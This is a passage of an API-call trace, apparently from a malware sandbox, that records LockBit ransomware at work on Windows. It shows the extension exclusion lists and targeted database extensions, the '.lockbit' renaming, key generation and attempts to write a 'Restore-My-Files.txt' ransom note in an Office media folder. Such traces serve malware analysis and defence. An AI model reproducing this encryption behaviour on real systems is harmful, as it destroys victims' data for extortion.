(lpString1=".dll", lpString2=".GIF") returned -1 [0209.940] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.941] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.941] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.941] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.941] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.941] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.941] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21326_.GIF") returned 1 [0209.941] lstrcmpiW (lpString1="ntldr", lpString2="BD21326_.GIF") returned 1 [0209.941] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21326_.GIF") returned 1 [0209.941] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21326_.GIF") returned 1 [0209.941] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21326_.GIF") returned -1 [0209.941] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21326_.GIF") returned 1 [0209.941] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21326_.GIF") returned 1 [0209.941] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.941] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21326_.GIF") returned=".GIF" [0209.941] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.941] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.941] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.941] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.941] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.941] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.941] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.941] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.941] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.941] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.941] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.941] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.942] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.942] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.942] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.942] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.942] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.942] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21326_.GIF.lockbit") returned 76 [0209.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21326_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21326_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x238 [0209.944] CreateIoCompletionPort (FileHandle=0x238, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.944] malloc (_Size=0x40068) returned 0x3d70450 [0209.944] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1785) returned 1 [0209.944] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.944] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0209.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0209.945] ReadFile (in: hFile=0x238, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0209.959] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21326_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21326_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.959] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.959] NtSetInformationFile (FileHandle=0x238, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0209.959] free (_Block=0x1fa2ed8) [0209.959] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21326_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.959] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.959] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.959] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a618b00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdc8c40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2a618b00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x185, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21328_.GIF", cAlternateFileName="")) returned 1 [0209.959] lstrcmpiW (lpString1=".", lpString2="BD21328_.GIF") returned -1 [0209.959] lstrcmpiW (lpString1="..", lpString2="BD21328_.GIF") returned -1 [0209.959] PathFindExtensionW (pszPath="BD21328_.GIF") returned=".GIF" [0209.959] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.959] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.959] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.959] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.960] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.960] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.960] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.960] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.960] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.960] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.960] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.960] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.960] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.960] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.961] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.961] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.961] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21328_.GIF") returned 1 [0209.961] lstrcmpiW (lpString1="ntldr", lpString2="BD21328_.GIF") returned 1 [0209.961] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21328_.GIF") returned 1 [0209.961] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21328_.GIF") returned 1 [0209.961] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21328_.GIF") returned -1 [0209.961] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21328_.GIF") returned 1 [0209.961] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21328_.GIF") returned 1 [0209.961] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.962] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21328_.GIF") returned=".GIF" [0209.962] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.962] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.962] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.963] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.963] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.963] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21328_.GIF.lockbit") returned 76 [0209.963] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21328_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21328_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x238 [0209.964] CreateIoCompletionPort (FileHandle=0x238, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.964] malloc (_Size=0x40068) returned 0x3df0008 [0209.964] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=389) returned 1 [0209.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.966] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.966] ReadFile (in: hFile=0x238, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21328_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21328_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.970] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.970] NtSetInformationFile (FileHandle=0x238, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0209.970] free (_Block=0x1fa2ed8) [0209.970] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21328_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.970] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.971] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.971] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ff3100, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdc8c40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x27ff3100, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x1d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21330_.GIF", cAlternateFileName="")) returned 1 [0209.971] lstrcmpiW (lpString1=".", lpString2="BD21330_.GIF") returned -1 [0209.971] lstrcmpiW (lpString1="..", lpString2="BD21330_.GIF") returned -1 [0209.971] PathFindExtensionW (pszPath="BD21330_.GIF") returned=".GIF" [0209.971] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.971] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.971] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.971] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.971] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.971] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.971] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.971] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.971] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.971] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.971] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.971] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.971] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.971] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.971] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.971] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.971] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.971] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.972] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.972] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.972] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.972] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.972] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.972] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.973] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.973] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21330_.GIF") returned 1 [0209.973] lstrcmpiW (lpString1="ntldr", lpString2="BD21330_.GIF") returned 1 [0209.973] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21330_.GIF") returned 1 [0209.973] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21330_.GIF") returned 1 [0209.973] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21330_.GIF") returned -1 [0209.973] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21330_.GIF") returned 1 [0209.973] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21330_.GIF") returned 1 [0209.973] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.973] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21330_.GIF") returned=".GIF" [0209.973] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.973] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.973] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.973] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.974] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.974] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21330_.GIF.lockbit") returned 76 [0209.974] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21330_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21330_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x238 [0209.976] CreateIoCompletionPort (FileHandle=0x238, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.976] malloc (_Size=0x40068) returned 0x3df0008 [0209.976] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=464) returned 1 [0209.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.977] ReadFile (in: hFile=0x238, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.981] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21330_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21330_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.981] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.981] NtSetInformationFile (FileHandle=0x238, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0209.982] free (_Block=0x1fa2ed8) [0209.982] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21330_.GIF" | out: 